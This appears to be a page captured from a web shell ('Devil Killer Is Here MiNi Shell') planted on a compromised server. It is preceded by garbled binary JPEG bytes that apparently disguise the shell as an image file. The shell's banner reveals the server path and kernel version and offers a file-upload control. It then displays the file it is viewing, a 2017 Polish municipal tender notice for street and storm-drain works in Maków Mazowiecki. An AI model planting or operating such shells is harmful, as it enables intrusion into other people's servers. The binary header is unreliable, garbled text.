JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170414/67250-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.makowmazowiecki.pl' target='_blank'>http://www.bip.makowmazowiecki.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 67250 - 2017
              z dnia 2017-04-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Maków Mazowiecki: Przebudowa ulic na Os. Bursztynowa wraz z montażem separatora  etap I<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Maków Mazowiecki, krajowy numer identyfikacyjny
              55066830900000, ul.
              ul. Moniuszki 
              6,
              06200  
              Maków Mazowiecki, woj.
              mazowieckie, państwo
              Polska, tel.
              297 171 002, e-mail
              urzad@makowmazowiecki.pl, faks
              297 171 507.
              <br />
              Adres strony internetowej (URL): www.bip.makowmazowiecki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.makowmazowiecki.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna <br />
                Adres:
                <br />Urząd Miejski w Makowie Mazowieckim ul. Moniuszki 6, 06-200 Maków Mazowiecki</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa ulic na Os. Bursztynowa wraz z montażem separatora  etap I<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>BRANŻA DROGOWA

ULICA BURSZTYNOWA  początek pikietaża projektowanego odcinka, km 0+000,00, przyjęto w punkcie przecięcia projektowanej osi z osią ulicy Zachodniej, a koniec w km 0+367,72 na przecięciu z osią ulicy Szmaragdowej. Przyjęto do projektowania parametry dla ulicy klasy D, przy założeniu ruchu KR2 i warunkach gruntowo-wodnych G2 (na podstawie badań geologicznych). Projektowana niweleta jezdni została dostosowana do istniejącego poziomu zabudowy, ogrodzeń i wjazdów. Trasę poprowadzono linią prostą bez łuków poziomych. Włączenie do ulicy Zachodniej przyjęto promieniem R1= 6,00 m a zjazd z ulicy Zachodniej promieniem R2= 4,00 m. Przyjęto przekrój uliczny z: 
- jezdnią szerokości 5,00 m ograniczoną z obu stron krawężnikami betonowymi wyniesionymi 4 cm o nawierzchni z kostki brukowej betonowej, grubości 8 cm. Po obu stronach zaprojektowano ścieki liniowe  przykrawężnikowe, szer. 0,20 m każdy i głębokości 0,02 m, z kostki brukowej betonowej grubości 6 cm. Jezdni nadano spadki poprzeczne dwustronne (przekrój daszkowy) przy i=+(-) 2%. 
- przystającym chodnikiem, po prawej stronie jezdni, szerokości 2,00 m (z krawężnikiem) z kostki brukowej betonowej grubości 8 cm, z dopuszczeniem najazdu pojazdów  wprowadzono spadek poprzeczny i=2% ze skierowaniem do jezdni. 
- przystającym pasem zieleni niskiej (warstwa humusu gr. 10 cm z obsianiem trawą), po lewej stronie, szerokości 2,00 m (z krawężnikiem). 
Zjazdy przyjęto jako bramowe zgodnie z KPED (Katalog Powtarzalnych Elementów Drogowych): indywidualny wg. karty 03.90 o szerokości jezdni 5,00 m ze skosami wjazdowymi w stosunku 1:1. Nawierzchnię zjazdów przyjęto z kostki brukowej betonowej, koloru czerwonego, grubości 8 cm.
Konstrukcja nawierzchni jezdni: 
- warstwa ścieralna z (szarej) kostki brukowej betonowej gr. 8 cm, 
- podsypka cementowo  piaskowa (1:4), gr. warstwy 3  5 cm, 
- podbudowa pomocnicza z kruszywa naturalnego łamanego 0/31,5 grubości 25 cm, 
- wzmocnienie podłoża z gruntu stabilizowanego cementem  M-2,5 Mpa (z betoniarki), gr. warstwy 10 cm, 
- warstwa odcinająca z piasku, gr. warstwy 10 cm, 
- istniejące podłoże, wyprofilowane i zagęszczone zgodnie z SST. 
Konstrukcja nawierzchni chodnika najazdowego i zjazdów indywidualnych: 
- warstwa ścieralna z kostki brukowej betonowej gr. 8 cm (kolor czerwony dla zjazdów i grafitowy dla ciągu pieszego), 
- podsypka cementowo  piaskowa (1:4) gr. 3  5 cm, 
- podbudowa gr. 15 cm z kruszywa naturalnego łamanego 0/31,5, 
- wzmocnienie podłoża gruntem stabilizowanym cementem (z betoniarki)  M=2,5 N/mm2, grubość warstwy 10 cm, 
- warstwa odcinająca z piasku, gr. warstwy 10 cm, 
- istniejące podłoże, wyprofilowane i zagęszczone zgodnie z SST. 
Nawierzchnię chodnika, od strony terenu, należy ograniczyć obrzeżami betonowymi 8 x 30 cm, posadowionymi na podsypce cementowo  piaskowej. Nawierzchnię zjazdu szerokości 5,00 m, od strony terenu i posesji, należy ograniczyć opornikami betonowymi 12 x 25 cm, wtopionymi, posadowionymi na ławie z oporem z betonu C12/15. Od strony jezdni ulic przyjęto skosy wjazdowe 1:1 (m). Roboty ziemne (wykopy), przy zbliżeniu do urządzeń i sieci umieszczonych w pasie drogowym, należy wykonywać ręcznie.  Należy zwrócić szczególną uwagę przy robotach drogowych w miejscach zbliżenia do urządzeń sieci wodociągowej. Należy skrzynki zaworów wodociągowych, włazy studni rewizyjnych dostosować wysokościowo do projektowanej powierzchni jezdni ulic. Na przejściach poprzecznych pod pasem jezdni należy zabezpieczyć kable rurami dwudzielnymi typu Arot (średnicy 110 cm) z wysunięciem po 0,50 m poza krawężniki. Prace wykonywać pod nadzorem administratora danej sieci.
BRANŻA SANITARNA
ULICA BURSZTYNOWA  zaprojektowany został kanał deszczowy z rur żelbetowych typu WIPRO w klasie A o średnicach zmiennych 400 mm, 500 mm i 600 mm i wytrzymałości odpowiednio 60, 75 i 120 kN/m. Rury WIPRO wykonane z betonu minimum C35/45. Przyłącza od studzienek ściekowych wykonać z rur PVC-U SN8 o średnicy 200 mm. Maksymalna długość rur PVC-U 3,00 m a rur WIPRO 2,50 m. Rury WIPRO układać na podbudowie betonowej z betonu B15 i wysokości 15 cm. Na połączeniach rur WIPRO łączonych przy pomocy uszczelek gumowych wykonać opaski z zaprawy cementowej M12. Powierzchnie zewnętrzne rur WIPRO zabezpieczyć izolacją przeciwwilgociową w dwóch warstwach z Abizolu R i P lub równoważnych. Rury do wysokości 50 cm ponad wierzch obsypać pospółką piaskowo-żwirową, ubijając wibratorami płytowymi o  wadze do 150 kg warstwami o wysokości 25 cm do uzyskania wskaźnika zagęszczenia 0,98. Powyżej 50 cm ponad wierzch rury zagęszczać wibratorami płytowymi o wadze do 200 kg. Rury PVC-U układać na podsypce piaskowo-żwirowej o wysokości 10 cm zwracając szczególną uwagę  na usunięcie kamieni z podsypki. Rury do wysokości 100 cm ponad wierzch obsypać pospółką piaskowo-żwirową, ubijając wibratorami płytowymi o wadze do 150 kg warstwami o wysokości 25 cm do uzyskania wskaźnika zagęszczenia 0,98. Powyżej 100 cm m zagęszczać wibratorami płytowymi jak wyżej. Studzienki połączeniowe o średnicy 1,2, 1,5 i 2,0 m wykonać wg. KB 4-4.12.1.6. z kręgów żelbetowych łączonych przy pomocy uszczelek o średnicy 1200, 1500 i 2000 mm i wysokości 200, 300, 500, 600  i 1000 mm łączonych na wpust i pióro z zastosowaniem uszczelek z elastomeru. Kręgi i podstawy studni żelbetowe wykonane z betonu C35/45. Na studzienkach montować włazy żeliwne typu ciężkiego wg. PN-/H-74051-2 klasy C 250 o wysokości korpusu minimum 115 mm lub z wypełnieniem betonowym. W studzienkach zamontować stopnie żeliwne wg. PN-64/H-74086. W studniach połączeniowych wykonać osadniki piasku i zanieczyszczeń stałych zgodnie z projektem. Na kolektorach o średnicy 500 i 600 mm zaprojektowano studnie 1500 mm, a na pozostałych kolektorach studnie o średnicy 1200 mm. Zgodnie z opinią o warunkach gruntowo  wodnych w miejscu projektowanych wykopów pod warstwą gleby i nasypów piaskowych występują gliny piaszczyste, gliny i żwiry z przewarstwieniami piasków i piasków gliniastych. Gliny nie nadają się do zasypki wykopów i muszą być wymienione. Wykopy o ścianach pionowych z zastosowaniem szalunków szczelnych wykonywane koparkami podsiębiernymi o pojemności łyżki do 0,4 m3. Szalowanie ścian elementami prefabrykowanymi systemowymi lub balami drewnianymi. W miejscach skrzyżowań kanalizacji z uzbrojeniem podziemnym wykopy wykonywać ręcznie. Ziemię z wykopów wywieźć w miejsce wskazane przez Inwestora. Przy zasypywaniu wykopów grunty zagęszczać warstwami do uzyskania wskaźnika zagęszczenia 0,98. Grunty nie nadające się do zagęszczenia należy wymienić na pospółkę żwirowo  piaskową.  Z uwagi na występowanie przesączeń wody gruntowej  w pobliżu kanału na czas realizacji robót przewiduje się odwodnienie wykopów igłofiltrami wpłukanymi w grunt w obsypce żwirowej.


ULICA DUŃSKIEGO CZERWONEGO KRZYŻA  zaprojektowany został kanał deszczowy z rur  bezkielichowych żelbetowych SIMPLEX o średnicy 1000 mm. Zgodnie z opinią o warunkach gruntowo  wodnych w miejscu projektowanych wykopów pod warstwą gleby i nasypów piaskowych występują gliny piaszczyste, gliny i żwiry z przewarstwieniami piasków i piasków gliniastych. Gliny nie nadają się do zasypki wykopów i muszą być wymienione. Wykopy o ścianach pionowych z zastosowaniem szalunków szczelnych wykonywane koparkami podsiębiernymi o pojemności łyżki do 0,4 m3. Szalowanie ścian elementami prefabrykowanymi systemowymi lub balami drewnianymi. W miejscach skrzyżowań kanalizacji z uzbrojeniem podziemnym wykopy wykonywać ręcznie. Ziemię z wykopów wywieźć w miejsce wskazane przez Inwestora. Przy zasypywaniu wykopów grunty zagęszczać warstwami do uzyskania wskaźnika zagęszczenia 0,98. Grunty nie nadające się do zagęszczenia należy wymienić na pospółkę żwirowo  piaskową.  Z uwagi na występowanie przesączeń wody gruntowej  w pobliżu kanału na czas realizacji robót przewiduje się odwodnienie wykopów igłofiltrami wpłukanymi w grunt w obsypce żwirowej. Rury SIMPLEX układać na podbudowie betonowej z betonu B15 i wysokości 15 cm. Powierzchnie zewnętrzne rur SIMPLEX zabezpieczyć izolacją przeciwwilgociową w dwóch warstwach z Abizolu R i P lub równoważnych. Rury do wysokości 50 cm ponad wierzch obsypać pospółką piaskowo-żwirową, ubijając wibratorami płytowymi o  wadze do 150 kg warstwami o wysokości 25 cm do uzyskania wskaźnika zagęszczenia 0,98. Powyżej 50 cm ponad wierzch rury zagęszczać wibratorami płytowymi o wadze do 200 kg. Studzienki połączeniowe o średnicy 1,2, 1,5 i 2,0 m wykonać wg. KB 4-4.12.1.6. z kręgów żelbetowych łączonych przy pomocy uszczelek o średnicy 1200, 1500 i 2000 mm i wysokości 200, 300, 500, 600  i 1000 mm łączonych na wpust i pióro z zastosowaniem uszczelek z elastomeru. Kręgi i podstawy studni żelbetowe wykonane z betonu C35/45. Na studzienkach montować włazy żeliwne typu ciężkiego wg.  PN-/H-74051-2 klasy C 250 o wysokości korpusu minimum 115 mm lub z wypełnieniem betonowym. W studzienkach zamontować stopnie żeliwne wg. PN-64/H-74086. W studniach połączeniowych wykonać osadniki piasku i zanieczyszczeń stałych zgodnie z projektem. Na kolektorze o średnicy 1000 mm zaprojektowano studnie o średnicy 2000 mm. Wylot boczny wód opadowych i roztopowych projektuje się w formie doku, wykonanego z betonu klasy B25 zbrojonego podwójną siatką z prętów ożebrowanych o średnicy 8 mm. Ściany fundamentowe o głębokości 1,0 m osadzone na nasypie kamiennym. Ściany fundamentowe i boczne o grubości 25 cm. Podstawowe wymiary wylotu: wysokość  - 298 cm, głębokość - 230 cm, szerokość - 206 cm. Rzędna dna rury w wylocie - 98,84 m n.p.m. Na ścianie czołowej projektuje się kratę podnoszoną z prętów stalowych pionowych o rozstawie osiowym 15 cm. Dno rowu i skarpy boczne przy wylocie umocnione materacami gabionowymi układanymi na podsypce z pospółki i geowłókninie. Na zakończeniach materaców zaprojektowano palisady z kołków drewnianych o średnicy  12 cm wbijanych na głębokość minimum 1,5 m. Stopę skarpy cieku umocnić kiszką faszynową 2 x 20 cm. Wylot boczny WB-02 wód opadowych i roztopowych projektuje się w formie doku, wykonanego z betonu klasy B25 zbrojonego podwójną siatką z prętów ożebrowanych o średnicy 8 mm. Ściany fundamentowe o głębokości 0,75 m osadzone na nasypie kamiennym. Ściany fundamentowe i boczne o grubości 20 cm. Podstawowe wymiary wylotu: wysokość  - 208 cm, głębokość - 220 cm, szerokość - 134 cm. Rzędna dna rury w wylocie - 106,20 m n.p.m. Skrzyżowanie sieci kanalizacji deszczowej z sączkami i zbieraczami wykonać zgodnie z załączonym projektem. W miejscu kolizji rurki drenarskie sączków o średnicy 5 cm i zbieraczy o średnicy 7,5 i 10 cm należy układać w korytkach z łat drewnianych zbitych z desek o grubości  2 cm i szerokości odpowiednio dla sączków 6 cm, zbieraczy 10 i 15 cm pod kątem prostym. Korytka drewniane wyprowadzić minimum 1,0 m poza skarpę wykopu dla sieci kanalizacji deszczowej. Rurki zbieraczy obłożyć słomą i obsypać do wysokości 10 cm ponad wierzch obsypką żwirową o frakcji  8-32 mm, a do wysokości 20 cm ponad wierzch pospółką piaskową. W przypadku kolizji sączka lub zbieracza z komorą lub studzienką połączeniową należy je przełożyć zgodnie z wyżej określonymi zasadami. Dopuszcza się za zgodą Inwestora odbudowę sączków o średnicy 5 cm rurą drenarską karbowaną z filtrem z włókna syntetycznego o średnicy 60 mm z PVC-U z otworami 1,5x5,0 mm. Rury drenarskie układać na łatach w sposób określony powyżej. Połączenie rurki ceramicznej i sączka uszczelnić. Miejsce styku owinąć pasem o odpowiedniej szerokości z przepuszczalnej wodę geowłókniny. Pas powinien dolegać szczelnie do rurki z PVC-U i sączka             i być zawinięty na zakład i minimum 15 cm z każdej strony połączenia. Dobrano separator koalescencyjny substancji ropopochodnych z 10-krotnym obejściem burzowym MAKH-II-B 100/1000 o przepływie nominalnym 100 l/sek i maksymalnym 1000 1/sek lub równoważny. Separatory przeznaczone są do oddzielania substancji ropopochodnych z wód deszczowych płynących grawitacyjnie w rozdzielczym systemie kanalizacji przed wprowadzeniem ich do odbiornika. Oddzielenie substancji ropopochodnych następuje dzięki zjawisku flotacji, zachodzącemu podczas poziomego przepływu zanieczyszczonych wód przez specjalnie skonstruowane sekcje żaluzjowe (lamelowe). W skład separatora wchodzą: żelbetowy zbiornik z pokrywą żelbetową w klasie betonu C35/45, króćce połączeniowe, przewód przelewu burzowego niezależny od komory separatora zespolony z odpływem nominalnym, wkład koalescencyjny komórkowy z koszem nośnym. Osadnik piasku. Dobrano osadnik piasku z kręgów żelbetowych o średnicy 2500 mm. Wysokość całkowita 4441 mm. Wysokość czynna osadnika 2450 mm.

Zamówienie obejmuje również wykonanie w pasie drogowym ulic Bursztynowej i Duńskiego Czerwonego Krzyża następujących robót: regulację znajdujących się na projektowanym obszarze: studni kanalizacji sanitarnej, skrzynek wodociągowych; studni teletechnicznych (w razie stwierdzenia złego stanu technicznego należy dokonać ich wymiany bądź naprawy); regulację bram wjazdowych/furtek na posesje po urządzeniu nowych zjazdów  dotyczy ulicy Bursztynowej (dostosowanie do nowej niwelety). Ponadto na Wykonawcy ciąży obowiązek wykonania monitoringu wybudowanej kanalizacji deszczowej, z którego dokumentacja powinna zostać dostarczona wraz z dokumentacją powykonawczą Inwestorowi.
<br /><br /><b>II.5) Główny kod CPV: </b>45233120-6<br /><b> Dodatkowe kody CPV:</b>45111200-0,
                45233252-0,
                45231300-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. posiadanie doświadczenia w realizacji zamówień odpowiadających przedmiotowi zamówienia tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawca wykonał jedno zadanie obejmujące prace budowlane związane z budową kanalizacji deszczowej oraz wykonaniem nawierzchni drogi lub jej remontem z wykorzystaniem technologii co najmniej takiej jaka została wskazana w dokumentacji projektowej; 
2. dysponowanie w celu wykonania zamówienia, osobą posiadającą uprawnienia do kierowania robotami budowlanymi (Kierownik budowy) o specjalności drogowej.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
